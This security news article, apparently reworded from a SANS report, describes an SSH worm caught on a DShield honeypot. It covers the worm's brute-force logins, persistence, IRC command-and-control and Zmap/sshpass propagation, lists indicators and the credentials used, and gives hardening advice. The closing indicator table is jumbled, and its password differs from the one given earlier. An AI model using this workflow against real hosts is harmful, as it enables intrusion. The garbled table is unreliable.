One of the most dependable vulnerabilities on the internet is still weak SSH passwords. Botnet operators take full advantage of them, transforming Linux systems into complete compromises in a matter of seconds. A self-spreading SSH worm that combines credential brute-forcing, multi-stage malware execution, persistent backdoors, IRC-based command-and-control, digitally signed command checks, and automated lateral movement via Zmap and sshpass was captured in action during a recent internship project using a DShield sensor.

The attack happened in a short period of time. The attacker connected from IP 83.135.10.12, which is associated with Versatel Deutschland in Germany, at 08:24:13. A second later, using the credentials "pi / raspberryraspberry993311," brute-force was successful. A malicious 4.7 KB bash script was uploaded through SCP by 08:24:15.

As the worm started C2 check-ins and scanning, execution struck at 08:24:16, locking in persistence, and the attacker disconnected at 08:24:17. A compromised Raspberry Pi is indicated as the launchpad by the SSH client banner SSH-2.0-OpenSSH_8.4p1 Raspbian-5+b1 with HASSH ae8bd7dd09970555aa4c6ed22adbbf56. Execution of Post-Compromise and Persistence Strategies The script started a full botnet lifecycle after authentication.

By adding itself to system startup files and setting up cron jobs for reboot survival, it first ensured persistence. Diagram of the observed attack's network (Source: sans) To clear the field, the malware then stopped competing processes, such as miners and botnets. For covert control, it changed the hosts file to reroute traffic to a known C2 server as the loopback address.

The next step is to activate an embedded RSA key, which digitally verifies all incoming C2 commands to prevent tampering. The script locked into channel Biret and joined six IRC networks. A TCP handshake concluded enrollment, during which the C2 registered the device's nickname and performed "PING-PONG" life checks.

The bot confirmed uptime by responding with a "PONG" if the C2 sent a "PING." Defensive Instruction and Lateral Propagation The worm installed Zmap and sshpass for expansion while C2 was operational. It looked for an open SSH port 22 by scanning 100,000 random IP addresses. Credential Stuffing SSH Worm Found (Source: sans) Credential tests were triggered by hits: "pi/raspberry" first, followed by "pi / raspberryraspberry993311."

Success allowed for quick, silent spread by looping the entire infection chain.

Although there was no cryptominer dropped in this capture, the logic of the script that kills rivals implies that one would. This chain is significant because it highlights fundamental defects. In the absence of brute-force blocks or key-based authentication, default credentials on internet-facing devices invite immediate pwnage.

Prime botnet fodder is frequently made available online with factory settings intact by IoT devices like Raspberry Pis. Worm speed was demonstrated by the entire sequence clocking in under four seconds before scanning started. Credential Stuffing SSH Worm Found (Source: sans) Sans claims that defenders are capable of successfully retaliating. Change SSH to key-only and do away with passwords completely.

On Raspberry Pis, remove the default "pi" user. Use fail2ban to prevent recurring brute-force attacks. IoT networks should be divided to reduce the blast radius. These kinds of tools transform soft targets into strongholds.

Without the fundamentals in place, even hobbyist Linux boxes can turn into botnet zombies, as demonstrated by this DShield catch. With the exception of minor setups, security hardening has begun. Value Attacker Key IOCs Indicator Type Credentials for pi/raspberry993311 SSH HASSH ae8bd7dd09970555aa4c6ed22adbbf56 IP 83.135.10.12 Size of IRC Channel #biret Malware 4.7 KB of bash code